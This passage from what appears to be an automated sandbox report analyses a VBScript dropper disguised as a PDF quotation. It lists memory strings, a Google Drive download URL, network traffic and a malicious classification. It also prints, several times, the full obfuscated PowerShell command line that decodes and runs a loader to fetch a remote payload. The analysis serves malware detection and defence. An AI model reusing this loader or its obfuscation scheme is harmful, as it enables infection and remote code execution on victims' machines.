Source: powershell.exe, 00000002.00000002.2609687458.000001D600001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2609687458.000001D601C38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60175D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176sP
Source: powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com(
Source: powershell.exe, 00000002.00000002.2609687458.000001D600491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601DC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6005E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601165000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D6016ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D60071F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600A02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600ED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600B4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601162000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1TFXcrJWTGmac2hj-VsLoWxwsskgB176s&export=download
Source: powershell.exe, 00000002.00000002.2609687458.000001D600226000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2631379660.000001D6101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2631379660.000001D610074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2609687458.000001D6004F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D600437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2609687458.000001D601CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57680 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57684 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57687
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57688
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57689
Source: unknown Network traffic detected: HTTP traffic on port 57668 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57681 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57677 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57685 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57688 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 57682 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57686 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57668
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57672
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57673
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57674
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57675
Source: unknown Network traffic detected: HTTP traffic on port 57689 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57671
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 57673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 57679 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57683 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57687 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57676
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57677
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57678
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57679
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57683
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57684
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57685
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57686
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57680
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57681
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57682
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57672 -> 443
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:57674 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.9:57685 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.9:57686 version: TLS 1.2

System Summary

barindex
Source: Initial file: Call Betalingsdatos.ShellExecute(Aeronautic, Glosseret, "", "", Milieuvenligste)
Source: Urgent Quotation Notification_pdf.vbs Static file information: Suspicious name
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und Jump to behavior
Source: Urgent Quotation Notification_pdf.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5548
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5548 Jump to behavior
Source: classification engine Classification label: mal88.expl.evad.winVBS@4/5@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Bumpenes.sam Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jitc4mea.v5j.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Urgent Quotation Notification_pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et ubyAfvPBjerKofoKretUnaowitcMatoKinlskrTGluyskipPosesal]A i: ej:Y uT oclObjs Kv1sym2Mas ');$Certifiability=$Preimport[0];$Fortolke=(Fabrikskomplekserne ' re$BlagstaLsano arBMulasjkLKon:GenC BrhMo,a.nnN asn,ndiPoleLe.=ComNb teHooW .i-sp osneBUdnjacce asCArkTKas UbesB uYCams CeTMune dsMTra.sp,nmisEposT De. nowBereNonb LycNonl,isIBrieHusN Hjtopf ');Trolddomskunsternes ($Fortolke);Trolddomskunsternes (Fabrikskomplekserne 'lug$,nkCHyphPreaEnenBa.ns,ei MieAnt.VivHK,nes raAt,d GyeC xr UdsFel[ st$NynULymnFleeIn.n ontRe aUnoi AclBeeeFord Ac]Ani=sk $TrkPUrelsataFe.tBentinteKg.n ytsicilIrras,igDrme CerHol ');$Bufferkapaciteterne=Fabrikskomplekserne 'Unp$ DaCDeph.araBilnCoan raiInteD,m.Und
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Cantharidating Desinficerer afgrdernes Mistakenly Bunsen spadestres #>;$Befleaing='subclans';<#Opinionsdannelserne leia Entomophthorous Hedninger #>;$Essens=$host.PrivateData;If ($Essens) {$Becollier++;}function Fabrikskomplekserne($syngespil){$Brace66=$Frafaldendes+$syngespil.Length-$Becollier;for( $Acuserl=3;$Acuserl -lt $Brace66;$Acuserl+=4){$stevedorerne+=$syngespil[$Acuserl];}$stevedorerne;}function Trolddomskunsternes($Pretabulation){ . ($Untenseness) ($Pretabulation);}$Plattenslager=Fabrikskomplekserne 'DimMsejoDehzsanimetlAntlE.sa a/spi5Unr.Ga 0.ka Wax( K,WAntiPann PodRumoa awIdisAlm t N reT Me Lea1Fil0Fel.ska0si.;fje TrtW.emi G,nCry6Cla4Tan; ,p staxNot6 ra4 Il;Pe Pr r AlvTin:Nya1I t2Ou 1.mt.Bio0Ret)Ice AcGOvee Elc TokF do Mi/met2Fli0 nf1 ,h0Ren0 ta1 nd0 B 1 ar AalFsemiHalrPave vef FioW.ax Il/Tun1As.2 ri1sna. t0Hvi ';$Unentailed=Fabrikskomplekserne ' F.U ,ns alEGr REks-sarABebg EleMa nTipTRes ';$Certifiability=Fabrikskomplekserne ' GehRe t Unt hpFe sFum:Brn/Che/OpddEjerLydi CovJaze nu.,ragA eo CaoMilg ,elB,sesha. .oc.olo,oemFed/ P.u P cNo.?Po e.etxmedpKo o Puras.tMa =VaadFinoFngwMe.nUnll s oTe.a nodPre& igiRidd ar=,la1CluTserFTegXOnyc.fdrPreJP eWOutTD.yGPjamLysaEvic Na2Gr hElejO r-DevV Trsm dL.aro,idWcepxDisw ,es f.sseskBi gUnoBstv1tor7M g6Gyls G. ';$Tilskringskursuset=Fabrikskomplekserne 'F.b>Lac ';$Untenseness=Fabrikskomplekserne ' UniTinEEn xDo ';$Remburserne='Kohoveder';$bakie='\Bumpenes.sam';Trolddomskunsternes (Fabrikskomplekserne 'Tre$ Teg mbl Hao mmb anaLomlsk :EndDFesuvoltFr,itr.aVacb Bll eePo =Mon$ lae Pan upvPre:Ka as,mpMisp CodOrdaRaatBaraTek+ De$EkkbD aa rak uniBroeO d ');Trolddomskunsternes (Fabrikskomplekserne 'Tan$,ksgD al FooAnnbBl a Hylpha: KaP Torpolel,di Almbelp vo ndrGartBle=sup$LimC eveprorApptsayiza f ai .kaFisbFaliOrnlChaiHyptWriyTen.CarsProp MilTeli ExtP l(Pai$PraTd.wivesl O.s HuksamrFo iCaln Zog scstilkPosuB.drs tsBa u TosPr.e aftBla)B l ');Trolddomskunsternes (Fabrikskomplekserne 'Mol[.erN.ocePret.tu.Angs tre,iarsmevHumiFe cgrues,rP ao lmiLevnDeft MoMsu aCasn ska olgslieB.yrAdn] Wr:Gth:BrssFree T cUnmu,anrYppi nttsvey InPChirbriostitOutoRifcMejotyrl Fo Bof= st ,ys[In.NUboeD.rtTpp.s ossofeOvecUnduN,tr Fri et 